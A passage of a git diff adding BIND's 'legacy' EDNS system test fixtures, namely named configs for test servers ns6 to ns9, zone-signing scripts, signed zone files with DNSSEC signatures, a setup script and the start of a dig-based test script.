4wB+OYnc6RSKrJWuvzUzyK4mCK619lVhgMi5 + Jl6kBo7swgeriVhEODJVcX1ZEkd5WUwkpumw + JReLYStQKM8AbulcLQ4/bPwurhVPDpoNK6WL + kuv0MXijsFWps43ojok6DGPD01c7FRWxAKZV + eywmEIGLSYHDnWAzVIErXuO7RPfvLIVlZJzq + nzVj0ZLDh2BrrwbLt5zoETY5Ka6d6/YUXJLQ + Y+lxqTaDuJHnTqF7vcvxdkjYtR6JhsA4nfAO + TJHTtETInoRdXBTHahG5Q6tkj3kbhqR7dBc= ) diff --git a/bin/tests/system/legacy/ns6/named.args b/bin/tests/system/legacy/ns6/named.args new file mode 100644 index 0000000..64e5524 --- /dev/null +++ b/bin/tests/system/legacy/ns6/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D legacy-ns6 -X named.lock -g -U 4 -T maxcachesize=2097152 -T maxudp512 diff --git a/bin/tests/system/legacy/ns6/named.conf.in b/bin/tests/system/legacy/ns6/named.conf.in new file mode 100644 index 0000000..17f19d9 --- /dev/null +++ b/bin/tests/system/legacy/ns6/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "edns512" { + type primary; + file "edns512.db.signed"; +}; diff --git a/bin/tests/system/legacy/ns6/sign.sh b/bin/tests/system/legacy/ns6/sign.sh new file mode 100755 index 0000000..6ebc2a4 --- /dev/null +++ b/bin/tests/system/legacy/ns6/sign.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +SYSTESTDIR=legacy + +echo_i "sign edns512" + +zone=edns512 +infile=edns512.db.in +zonefile=edns512.db +outfile=edns512.db.signed + +keyname1=`$KEYGEN -a RSASHA512 -b 4096 -n zone $zone 2> /dev/null` +keyname2=`$KEYGEN -f KSK -a RSASHA512 -b 4096 -n zone $zone 2> /dev/null` + +cat $infile $keyname1.key $keyname2.key >$zonefile + +$SIGNER -g -o $zone -f $outfile -e +30y $zonefile > /dev/null 2> signer.err || cat signer.err diff --git a/bin/tests/system/legacy/ns7/edns512-notcp.db.in b/bin/tests/system/legacy/ns7/edns512-notcp.db.in new file mode 100644 index 0000000..89f3e83 --- /dev/null +++ b/bin/tests/system/legacy/ns7/edns512-notcp.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 60 SOA ns marka.isc.org. 1 0 0 0 0 +@ 60 NS ns +ns 60 A 10.53.0.7 diff --git a/bin/tests/system/legacy/ns7/edns512-notcp.db.signed b/bin/tests/system/legacy/ns7/edns512-notcp.db.signed new file mode 100644 index 0000000..87c8036 --- /dev/null +++ b/bin/tests/system/legacy/ns7/edns512-notcp.db.signed @@ -0,0 +1,248 @@ +; File written on Fri Dec 5 16:35:58 2014 +; dnssec_signzone version 9.11.0pre-alpha +edns512-notcp. 60 IN SOA ns.edns512-notcp. marka.isc.org. ( + 1 ; serial + 0 ; refresh (0 seconds) + 0 ; retry (0 seconds) + 0 ; expire (0 seconds) + 0 ; minimum (0 seconds) + ) + 60 RRSIG SOA 10 1 60 ( + 20441127043558 20141205043558 59033 edns512-notcp. + ESBGgT1akISzDYasx1vDn4479d3zRZKvHIEb + OJIn2UqPVl6YDzcuUIqRwvFoqV7/eT4tllJ/ + DSywHFPKV5t42BvnF2bEtPJZb6GUg3ZCqja4 + CEaUNtqd4xyIT8BMT29w+d0OE6wbjaF3F3rS + RePp8RXde62vuR1rseTYLCF/V3jh1RvZCf3b + HnmavjU7Gzu6SG1IyBnxxJ43lvUOpKPbEiLa + H2MTRNzMxQ1CB7nv953XuWDjlqv37LqzQgt+ + qHYC+Tjqx5KVUMewOAbcc4sne+ohMgz9p04h + JS3TIejgOfybFcmsZnsiqPkR9GKlDJ/L6hBH + azWKrnaHgS5n/j1rIWteV70E/VKXmiVspWkj + asOQM5F/7+RZWBA/bVsJqQOUdt3o04h70bQ5 + mbPYY3AFpcpfPRVHoPAhvhMd5jdQoAY2SiI3 + Uehleuyt3K+tDPCdgRhkkFwI15OBH1Jh2Y59 + 7jvcXLqgI7T9kzUAbRpKOpR3+73Sa+UCx/Vw + iZqr03mBT8sSaZR1Zyd9y4b9yAQ7W2gHY1VM + 0N3lStdS938bwhcU5gN4ElkqXrwkCgVP8BoY + 3FotvKHUcLmnvrfKgnjcwReCJ66GeI+i205x + NcbDnmSfxYcW4VsLYA8yoQM+0NWmBBXT5JT/ + ybAmt683yRwbFnl/YovtNwXtNKMb8+FKJjw= ) + 60 NS ns.edns512-notcp. + 60 RRSIG NS 10 1 60 ( + 20441127043558 20141205043558 59033 edns512-notcp. + FLwTgbguhIW1UHjObRRogJg6RA5/32Sd7623 + +btt7TqXchUMJyQsiIdZ0g5+NKQNawnhY4CV + NwNTeEiW55fjrZJC1A+nwBXGeE0MP9a2ngkj + PNK6spLXe67hMqudgbdp3toSfx1M3jI4PJ0Q + ji1UryuIqleR6w77JiaSB55MpoVDUVui/y/Y + VYHJ2z4wVBA0upoLegE5S9fWWpWIuD8aCU9y + +WMWhUd92Jm1Z9NWc7M9cwPp5/CAmitV5wjZ + wWu17WytNbwpYBww+DB72CrvvMZvVw8fcbdC + 5FIxIr6Ed0dNjfoakcPTW5EtDTk9ms6AjdMn + edNRZXgVuGZEenqmmsfuHFvNCurrNZJHG/je + xm5qhN9N85pmBILWpJPArKxwC37i00t/28Wx + FY7H2a7RWgtHkxuvnh4pwpidr2ZD+L5hQQ+c + O7CpzQMmS+dFOLF4/FOs6d/Do/7rxs1plUgp + NjOW3ts4tK1OkKPypXovuMxyLQstrnTkCNjA + pA+K5OBXdEsmtbIhXVAlARcyXXoKnYVFqd9c + Czu0kS4xy8B/auWcBzPMVYuTWGhNWemm7J9P + 0zOOB4n6nsaM7/UIoWK7Qx1CJLLOiWdEYNur + ouS9X97/LnsRcO/SPWB0aBTJgsMVQBkDB073 + 0eZBJmUIAMidot4okbC3hQ3atQ0pGhDaAIo= ) + 0 NSEC ns.edns512-notcp. NS SOA RRSIG NSEC DNSKEY + 0 RRSIG NSEC 10 1 0 ( + 20441127043558 20141205043558 59033 edns512-notcp. + JEdGV3CAGd23NG76F0B6FT6uz6TNWmP3Ecck + aI8djQLmnhu8vV1eYf4JCAS/EBOU/gS7iP+R + ziiJ3bPrvA1JSJhieTGw8K5IplUSTGHmlaIq + PfKRqN41mB9f3qI3PkN8h0Y2SbLKjYMIrHG1 + 1R3LubcKwyEc+Y4ylqySaYO7JPcGznvWiu8k + KLcvYsBOy2V9gjY2Q1BYP6TR0QyYMXDht7cR + 27YSG2D+LP0HDIFV4f7T1SLjGmDl6ROh2Rnn + i51tnK02IwoDs207RC1ExlVqD4n/3JZIkh+M + c5FoPK/fV6IRz5cdwLk1Mv2ovihxPjryFLdw + 1ULSEc7gK8EkYfedv336GgZbDEWhWQgmVhPE + h26vJNF+ZSqWlo0tkKLAKzbd8yEguPf6HY1e + 0v5KVnUV3lINJIOmWtXDZNXho8WzA4WViqqW + yn+nTnRBg/20WdpHEhVDJKywQvKY6zsXMN8G + J++lx6FalaFdgE4gNcQQsu11VQDnJO90kKBU + uVRkFQArPj0TEaUWq+ZC1eJLKtraO9w/5ybw + LaIKBJBAcyU2jy7ieRc+NEY6rE2XOfJs0kEa + 8q5vM9/AFbX01yUEKnYj2CO/VhtfUa2tHEVo + JhATux63HBiTwhiYcyjfKhYcML2KoEYUCYU/ + DAdy4zrs352EC3gVxagyUxCNJZ1Bq0wq+jI= ) + 60 DNSKEY 256 3 10 ( + AwEAAcEBkn/cuVhdRTWMHt19O7h9F4Hx2t68 + u1JUZg7swLLvwfljqnNYjsKYk9EzUhIaYOAH + tVe7//cYwoVU4BFhY2DGbx1YE1LnKIGxfqpo + pFxDZC34TTl6jpoTP6kvj+XpeO0HfF2+DcyN + gnQcMGgHXyLWeRUJFt1As6o9tmsBiInGIZMT + E3/rANhtAGMLNzhRLN7CS/Tc5GhKaL66ueby + EYenEOAyDVgsuhr8Q9D5ka6xZmxzXFVswy2K + vsSxu9aoxVq4nACjIeTZ4GJy0v83zclV7hA+ + 5jlPDXMFtIpvwux5XALrNkUUPq+Fb5sc5/u1 + 41LcvdASnlk58I77HbsnfausvDxdYYxEns7K + 9e9N85dwyreM/OGTmm8p4hNDngZESAea7MrS + CsJpOGn9XLkVe6gZnBgB1cra+ezzTSWn+4QH + 17lIhFXYNjMV83df2h/gH3Gmthqnr9RgknZg + a8B/Czc7TeX6iy2gAOshKGyb6w12eJim1L8t + S5T138V8d6SigzxZz1raiJNolVhXyA8SbbDp + gBrcoEXN/WjwvWI+2ol5gzlqMeNw/F9SMoWd + pGIWkkNCNWBbhLWhp6qfhpRLUFwVys54LGOI + GSVRd9uJmc2hPdXoP8ephnCIeNJb8Zp6Dnps + syN0JaF815dKkOHff9GEjaiRLj0xWvtZSqNF + aGoB + ) ; ZSK; alg = RSASHA512; key id = 59033 + 60 DNSKEY 257 3 10 ( + AwEAAcEBkn/cuVhdRTWMHt19O7h9F4Hx2t68 + u1JUZg7swLLvwfljqnNYjsKYk9EzUhIaYOAH + tVe7//cYwoVU4BFhY2DGbx1YE1LnKIGxfqpo + pFxDZC34TTl6jpoTP6kvj+XpeO0HfF2+DcyN + gnQcMGgHXyLWeRUJFt1As6o9tmsBiInGIZMT + E3/rANhtAGMLNzhRLN7CS/Tc5GhKaL66ueby + EYenEOAyDVgsuhr8Q9D5ka6xZmxzXFVswy2K + vsSxu9aoxVq4nACjIeTZ4GJy0v83zclV7hA+ + 5jlPDXMFtIpvwux5XALrNkUUPq+Fb5sc5/u1 + 41LcvdASnlk58I77HbsnfausvDxdYYxEns7K + 9e9N85dwyreM/OGTmm8p4hNDngZESAea7MrS + CsJpOGn9XLkVe6gZnBgB1cra+ezzTSWn+4QH + 17lIhFXYNjMV83df2h/gH3Gmthqnr9RgknZg + a8B/Czc7TeX6iy2gAOshKGyb6w12eJim1L8t + S5T138V8d6SigzxZz1raiJNolVhXyA8SbbDp + gBrcoEXN/WjwvWI+2ol5gzlqMeNw/F9SMoWd + pGIWkkNCNWBbhLWhp6qfhpRLUFwVys54LGOI + GSVRd9uJmc2hPdXoP8ephnCIeNJb8Zp6Dnps + syN0JaF815dKkOHff9GEjaiRLj0xWvtZSqNF + aGoB + ) ; KSK; alg = RSASHA512; key id = 59034 + 60 RRSIG DNSKEY 10 1 60 ( + 20441127043558 20141205043558 59033 edns512-notcp. + IrMpyEssdfDiqBDfMI5BVicoN5Upu20Bq0eL + BKXuiYBoRhBJhBnv6bovD0XWMf0spgPMHz4f + lgc0zT+41lQykiydy6WDLJ184E4If35ip9jp + Lj2yJGKUCr1FrvtciYPmYuH3wBIWl5wNlzJd + qH3P6nO3xYU4lgsBQPDUKvLHX7HIuSJB+2by + wbs3jj5Q78Ri1ELqKCCicfKbZwsRY9vexjw8 + ptuJh+Y8kvhM/Yh7NyG5PByb5GRVVCCZ20ms + msBCiniPb/5IFiy7iUUiderLsa3y4UauTOKD + pKiOkBbB0XfxZtAsTZFU2W5seo6eoW3LfLp5 + fD/qqUKyRZzPZaqJmp2n7egmX3WmRw11ILXk + LEuXA3P65YVbfqv08lZHz5K6xFhWsIJoBeev + 2leb3hN6nmSFApltdF0PDEfq1ZV+sBpOBsKN + EekIGAYO28u3+7pjxMzMe5EMtDAajb9bZCT6 + 3ZTMPjlyT5ChtNRSIvgzgbfYAn1bigtQ+Opu + Jp82U+N1FRBNaSz7uw2uDAiE/cSNgfGIC7Dd + KBzWE6z/HFCzQp/gF8006AjztDq/SnyHWnWX + RzfMi1pE2IOT/GoCKOQwQNei0cG/ar+/ntVp + 3yg9PbYdhdMH8IQ1GpwczFfD1/I2/wuOGzPw + 1iFhd3dT9Sz2xgF/8xS95Ljgy8YgP+pmE3c= ) + 60 RRSIG DNSKEY 10 1 60 ( + 20441127043558 20141205043558 59034 edns512-notcp. + VusByVbeIayH6KfnbhxLKycQfjU2L2Ilfa9o + K/MjEve4vMjqKeYV0oNan2X4DvPZusKeMVJp + JhQxvBz2GXE6syjrL5eEQtdcn6MW5Ew40w2E + i7BCGiHYrxH+SJqSORl5pBjihe24dRWoHHt/ + 3CVBE18TU+ubSdLgOT3SvBtffJ1NVtvtCgpP + /yIgffhHOU/F0J+ewL6lmYzrkj/48Ep8F9e9 + suAoorKmRP4zmeiojQedM+4PfbRn0doOLFIR + 8RZK8rv9WeQv1mhUh9s0zY4UARRGRb9i8Zhr + ERor3lZprmujx/Ok6XndTW7vRY/0IfC2i99C + 0zfcIdzuZ96YtiUFFTynptz3yxrJqQxeJaFt + vuZ4rd5XqSb3uPu8wVzYJEwhNRPJGqBpRAba + vxqOV1HAw89t1sUKXQR2qQ4HvpIzRIxFpIKQ + hRPMyd6uz0EtPQFE6ri1C5JkZkbdZ0r5SauY + EqZMsIl8oGtt1S5kEK2Agqx4b1pUfSv6cOLb + 765SGYVr1RdjmFZ7ftYYZPyMKJl6t3/ruZ9f + iazQGzoO6O+nQq3DD8EjZynsnAedzyEe3Hxd + tJM1Rm3nWAPka4QV5hdzpU93N/ao4tRuCYp/ + 4pnVlc8MStuyuy9RRapEoOMs0iIQFPdidU+V + aM+ZSOa6RbYwzvzmX7I1UxBf5gKJzuDydDA= ) +ns.edns512-notcp. 60 IN A 10.53.0.7 + 60 RRSIG A 10 2 60 ( + 20441127043558 20141205043558 59033 edns512-notcp. + eY/gUZcEKDE0loJ4zaxwJDg4E/S+ILJOrJrC + Yb64VWSE7RAzoQt8gYXAcEec4NLo2ZFsckTL + O0jD4db+q1rJLtniw+Xg/fckXvjxt21jNR43 + +rW17ZuEYYlOWg9o+NyP9QnLjxNOR22f6gSx + FCLOca+8Yoxf4bw7EsdV98KajMFpcljQu2iE + NOKCoDSdunaZnhdP8kVuXO7P+VEXRa1OFzxb + mm2axihSqXcA7vdEdpGmTWoUFdG7p61Kl8Jw + rQzT7RiA3PoeyYoQ2wC2oitRr4lnsN/IF1vz + D3ldJ6pnYNVYmSHaS2potOMNDSTZtgV2LUmx + pqsaa3coYaJPJj0ijWzxw77nAXXQ7u/YWIzz + vUhXKygQIZaInl1msFPkFRy4AqriDmDnAAfJ + YyPunq7VkR2ExUhU1iFGGmDFE35ktxFl6AWL + /0CWElHPwuvqGksLnxrE7Syr25TOC+EhqDUS + G5X7/7Cb+Hl/twlA4oYDv8eXCwxMsncMp1cn + VDfwOrN4/JWzYcqNLTZHFRr+Uz7Fo8tGAri0 + p7yDVHg35QN7usMKfsU3WnoOm1VlD/sU8bTW + 32dudd3yauhdKlmytZ2s2PMrXBf7/fsjDlY6 + ZEc91TwM9Yt71FQ27XKoP5eFGajlxG+haoyB + 6jfoV4cIDq4MVerLOSUlczFjczbBXLHwLno= ) + 0 NSEC txt500.edns512-notcp. A RRSIG NSEC + 0 RRSIG NSEC 10 2 0 ( + 20441127043558 20141205043558 59033 edns512-notcp. + mR1PHdEWNP90/80SAlKkj7jV0hBj0eDxM5Q0 + RGPbv2pb1fOT/W8dTe2Qm/qwE0aY4nmRfiah + 8klCAXH9gvVAQFbPlz8tkLKEOrKjZM/YP9Vd + EoUmYj6+G2OXYvvetVStpqfiSK731iPUhKUD + Y0uYUzTyqgmOyyKWApk1+C+b3fYNS2E0jA77 + riOCULE2FSPim7cEGS7JWE22qRY4//ENQZ27 + eA+KbkXWR+vdqnQ6vs1cIwsbGbFFzmcogMT2 + 3cN1e2lNbzTZIpVd9ukwp8FqyT0p7oz+q5r/ + so4Zq0EGx473OgThMfTMs6pOg7L6M60jMhmF + 8V50dpePHmFLxI/Nn4kvxcUt684L3TWGObFQ + y9vxO8Wh66+USSX8jyDnP8mtMnGEeHD9SVYz + WIbCDVUsvSkFqSi/2o1/SZYWQ+wXkj6qO2Mz + JIgJKucALub0dOfaoncPYa7kfOxEOmgwY39I + RQodc53Brhgn6IF/1zNxZd5/FpWUs4ivrpsN + MOKy/E+MJiaGOdj1RwNlDdZQNtamexxOjcaD + 6pWAD44LgakoELE0Ktxtl/oMmouky0Dx/zwN + e9nEBTe9nTbG99lbzuGZ2vWkfqA1EsliCryd + wH6+EF3l5w9EEKBdVgBIEoHZ92TaiiJfRmFQ + LwEjS+AYjQKzmvp47lGqQf8/ggvMxcv/SCE= ) +txt500.edns512-notcp. 60 IN TXT "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" + 60 RRSIG TXT 10 2 60 ( + 20441127043558 20141205043558 59033 edns512-notcp. + fpzr1/DNby1CMHfZclvga7Pk9S3tqWn0wwC9 + xsUhYoPRcaIN4o9g5rOC0fxX1W4Q6gEXt0l2 + fKzUdxE9QqTgpJOAOcMJa7D1yRo2ifVoX3Oq + M2lUYusg3o0Wg1JuNnf3DXaSaLOiYOrS2ixs + XnPwU0pLiniGIT9Bh2OuMBPs5YP2dZRKKJ7z + VrxE4F213A0FQfN68tIbN5XrzwO8EfyjBTyM + YtApC33vMajYeILnFemLrs9VL5hbLoyKcyqg + 1n0eSXhneHlYgsS5anSXWOSd9sT46jqpFwYF + O+frR2DNmdua4eZiUqA9HMgvaQnNodVU2Z5r + 5lzrHSVSXS/Au7kp4FZtYCUj2W4m/grOidH9 + ulwM0Ut+OZOOLHVcwBQGuedEEwU/h+YGbJH6 + fomTvfW+NAaL6X3IJggcQnHmCOTf0f3xXeXT + iHK1hE+iabTQ8gCabt4KCQ11Oz8zu3j7ZB5T + 2byQ49N2jj+i8+p2wsRbnz5Algx15KP11NM0 + lUb+fhPlIrhbgwqPtv8udeRsBpRAwHXWrz5m + BxWQ5X52frQAPNoi51q5tTWE7UlpLYFBeXtW + 0XY7o6+TqP+EN5lGwddNhS0wYRWE10M2Es8A + 2q1RKIBDSPB3XEeULrQ6ciDgiDQ7T55p1KKM + r25OyqYCGZs9obDHnNVNQP2rTjfm6062TSo= ) + 0 NSEC edns512-notcp. TXT RRSIG NSEC + 0 RRSIG NSEC 10 2 0 ( + 20441127043558 20141205043558 59033 edns512-notcp. + pTTiIXjWLSH1Qm59kZlX0QmXtm7gDhL4RdQF + sHMtxZA1JhWjBC3u48C8M19ZWTu1xmTrhuil + tPV9a4u9zTasPWOy2HSKnl/jMaqGZ3xa96mo + I1qULVqb8XRTYqPsJ3reD6x9jJepEFAsK+xa + /TdrFTfZ5Oc0RYLQxH2qrJVc2n7S5gCHp10O + extcck2cyhiaRnI/wha6PdAXKG0ikX/oKAQL + hMcNUpOeewJLTvXasVPf4cF9O0B1/wXun3C4 + lkzKF+fYBe2qg6ikGgsHws72/TYD2xDOae41 + yjkVwdthTECDzedPc6jbKeApyEGA1G2lc7Ie + DE1rLRP3OhME5X9bhPcQnop4k583RQI0QY60 + PUdZ/cr99eM6Zj3Mal6zBrebPiBAJVnr8C4X + /ozv3MFmaoNalB0JuTVojCboQ6Sf7+UCumXk + VK56zx6ZiGcwtnKHRQZIGGsHpPt28zo33wKJ + 0xljGuxfnxstGGmUUCTrhi0U/8991ZdqnjHg + hBkWxmEm1X5ioIVy5c5M6baSoEmls4iwad/O + vU9cx0aXxqir7/5jYlMFjn6Xo2BuUVQWf/LY + E9rZRZUN0a4sh7Wj8pjKS1hJ5pTK9C3ijEqD + Y9B5OslWHcOhSlv4q9YwuZkBo/b8UiV6EOnS + vE/TgzfP7DcXjTI5qErka0iJMxz/m90VuiU= ) diff --git a/bin/tests/system/legacy/ns7/named.args b/bin/tests/system/legacy/ns7/named.args new file mode 100644 index 0000000..e491a95 --- /dev/null +++ b/bin/tests/system/legacy/ns7/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D legacy-ns7 -X named.lock -g -U 4 -T maxcachesize=2097152 -T maxudp512 diff --git a/bin/tests/system/legacy/ns7/named.conf.in b/bin/tests/system/legacy/ns7/named.conf.in new file mode 100644 index 0000000..ada7d4f --- /dev/null +++ b/bin/tests/system/legacy/ns7/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + max-udp-size 4096; + edns-udp-size 4096; + nocookie-udp-size 4096; +}; + +zone "edns512-notcp" { + type primary; + file "edns512-notcp.db.signed"; +}; diff --git a/bin/tests/system/legacy/ns7/named.notcp b/bin/tests/system/legacy/ns7/named.notcp new file mode 100644 index 0000000..e25c3a8 --- /dev/null +++ b/bin/tests/system/legacy/ns7/named.notcp @@ -0,0 +1 @@ +notcp diff --git a/bin/tests/system/legacy/ns7/sign.sh b/bin/tests/system/legacy/ns7/sign.sh new file mode 100755 index 0000000..90ceca9 --- /dev/null +++ b/bin/tests/system/legacy/ns7/sign.sh @@ -0,0 +1,34 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +SYSTESTDIR=legacy + +echo_i "sign edns512-notcp" + +zone=edns512-notcp +infile=edns512-notcp.db.in +zonefile=edns512-notcp.db +outfile=edns512-notcp.db.signed + +keyname1=`$KEYGEN -a RSASHA512 -b 4096 -n zone $zone 2> /dev/null` +keyname2=`$KEYGEN -f KSK -a RSASHA512 -b 4096 -n zone $zone 2> /dev/null` + +cat $infile $keyname1.key $keyname2.key >$zonefile + +$SIGNER -g -o $zone -f $outfile -e +30y $zonefile > /dev/null 2> signer.err || cat signer.err + +keyfile_to_static_ds $keyname2 > trusted.conf +cp trusted.conf ../ns1 diff --git a/bin/tests/system/legacy/ns8/ednsformerr.db b/bin/tests/system/legacy/ns8/ednsformerr.db new file mode 100644 index 0000000..9aa3a4a --- /dev/null +++ b/bin/tests/system/legacy/ns8/ednsformerr.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 60 SOA ns marka.isc.org. 1 0 0 0 0 +@ 60 NS ns +ns 60 A 10.53.0.8 diff --git a/bin/tests/system/legacy/ns8/named.conf.in b/bin/tests/system/legacy/ns8/named.conf.in new file mode 100644 index 0000000..7431cf8 --- /dev/null +++ b/bin/tests/system/legacy/ns8/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.8; + notify-source 10.53.0.8; + transfer-source 10.53.0.8; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.8; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "ednsformerr" { + type primary; + file "ednsformerr.db"; +}; diff --git a/bin/tests/system/legacy/ns8/named.ednsformerr b/bin/tests/system/legacy/ns8/named.ednsformerr new file mode 100644 index 0000000..e35cb02 --- /dev/null +++ b/bin/tests/system/legacy/ns8/named.ednsformerr @@ -0,0 +1 @@ +ednsformerr diff --git a/bin/tests/system/legacy/ns9/ednsnotimp.db b/bin/tests/system/legacy/ns9/ednsnotimp.db new file mode 100644 index 0000000..9aa3a4a --- /dev/null +++ b/bin/tests/system/legacy/ns9/ednsnotimp.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 60 SOA ns marka.isc.org. 1 0 0 0 0 +@ 60 NS ns +ns 60 A 10.53.0.8 diff --git a/bin/tests/system/legacy/ns9/named.conf.in b/bin/tests/system/legacy/ns9/named.conf.in new file mode 100644 index 0000000..385fbfd --- /dev/null +++ b/bin/tests/system/legacy/ns9/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.9; + notify-source 10.53.0.9; + transfer-source 10.53.0.9; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.9; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "ednsnotimp" { + type primary; + file "ednsnotimp.db"; +}; diff --git a/bin/tests/system/legacy/ns9/named.ednsnotimp b/bin/tests/system/legacy/ns9/named.ednsnotimp new file mode 100644 index 0000000..4e6424d --- /dev/null +++ b/bin/tests/system/legacy/ns9/named.ednsnotimp @@ -0,0 +1 @@ +ednsnotimp diff --git a/bin/tests/system/legacy/setup.sh b/bin/tests/system/legacy/setup.sh new file mode 100644 index 0000000..2356d8f --- /dev/null +++ b/bin/tests/system/legacy/setup.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named1.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf +copy_setports ns8/named.conf.in ns8/named.conf +copy_setports ns9/named.conf.in ns9/named.conf +copy_setports ns10/named.conf.in ns10/named.conf diff --git a/bin/tests/system/legacy/tests.sh b/bin/tests/system/legacy/tests.sh new file mode 100755 index 0000000..5e1622b --- /dev/null +++ b/bin/tests/system/legacy/tests.sh @@ -0,0 +1,275 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT} +tries=1 +time=2" + +# Check whether the SOA record for the name provided in $1 can be resolved by +# ns1. Return 0 if resolution succeeds as expected; return 1 otherwise. +resolution_succeeds() { + _ret=0 + $DIG $DIGOPTS +tcp +tries=3 +time=5 @10.53.0.1 ${1} SOA > dig.out.test$n || _ret=1 + grep "status: NOERROR" dig.out.test$n > /dev/null || _ret=1 + return $_ret +} + +# Check whether the SOA record for the name provided in 